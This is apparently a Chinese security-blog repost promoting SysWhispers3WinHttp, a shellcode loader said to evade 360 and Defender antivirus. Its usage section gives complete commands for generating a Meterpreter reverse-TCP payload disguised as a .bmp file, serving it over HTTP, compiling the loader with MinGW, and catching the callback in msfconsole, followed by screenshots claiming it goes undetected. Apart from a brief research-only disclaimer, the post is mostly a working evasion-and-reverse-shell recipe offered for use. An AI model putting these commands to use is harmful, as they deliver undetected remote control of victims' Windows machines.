2023年6月6日01:28:14评论331 views字数 1370阅读4分34秒阅读模式

SysWhispers3WinHttp

SysWhispers3WinHttp 基于SysWhispers3项目增添WinHttp分离加载功能并使用32位GCC进行编译，文件大小14KB，可免杀绕过360核晶防护与Defender。

0x01 免责声明：

该项目仅供安全研究使用，禁止使用该项目进行违法操作，否则由使用者承担全部法律及连带责任。

0x02 使用：

// 1. 使用msfvenom生成shellcode（或使用CobaltStrike生成Stageless之Shellcode）msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.1.104 lport=4444 -f raw -o test.bmp
// 2. 使用python3开启Web服务（或使用CobaltStrike之HostFile功能）python3 -m http.server
// 3. 修改SysWhispers3WinHttp.c 第40行IP地址并使用32位GCC交叉编译i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -fpermissive -w -s -lwinhttp

注：Windows下32位GCC下载地址为

https://master.dl.sourceforge.net/project/mingw-w64/Toolchains%20targetting%20Win32/Personal%20Builds/mingw-builds/6.4.0/threads-win32/sjlj/i686-6.4.0-release-win32-sjlj-rt_v5-rev0.7z?viasf=1

0x03 演示：

msfconsolemsf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcpmsf6 exploit(multi/handler) > set lhost 0.0.0.0msf6 exploit(multi/handler) > set lport 4444msf6 exploit(multi/handler) > run

360核晶截图

干货 | 免杀绕过360核晶防护与Defender，附代码

Defender截图

干货 | 免杀绕过360核晶防护与Defender，附代码

微步云沙箱截图

干货 | 免杀绕过360核晶防护与Defender，附代码

项目地址：

https://github.com/huaigu4ng/SysWhispers3WinHttp

记得Follow和Star哦！

参考来源

https://github.com/klezVirus/SysWhispers3https://learn.microsoft.com/zh-cn/windows/win32/api/winhttp/nf-winhttp-winhttpconnect

干货 | 免杀绕过360核晶防护与Defender，附代码

推荐阅读

实战 | 记一次渗透拿下某儿童色情网站的经过

实战 | 某某街一处XSS的绕过思路

实战 | 记一次企业钓鱼演练

干货 | 2022年超全的安全知识库

实战 | 实战一次完整的BC网站渗透测试

星球部分精华内容推荐

干货 | 免杀绕过360核晶防护与Defender，附代码

其他更多精彩内容，欢迎加入我们的星球

干货 | 免杀绕过360核晶防护与Defender，附代码

原文始发于微信公众号（HACK学习君）：干货 | 免杀绕过360核晶防护与Defender，附代码

左青龙
微信扫一扫

右白虎
微信扫一扫

干货 | 免杀绕过360核晶防护与Defender，附代码

SysWhispers3WinHttp

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

任意文件读取rce记录

信创 | 国产数据库派别分类

应急响应常用命令手册

漏洞利用-PoC-in-GitHub+msf简单利用

rust 免杀-免杀和喝水一样简单

RFD漏洞原理浅析

发表评论

在线咨询

微信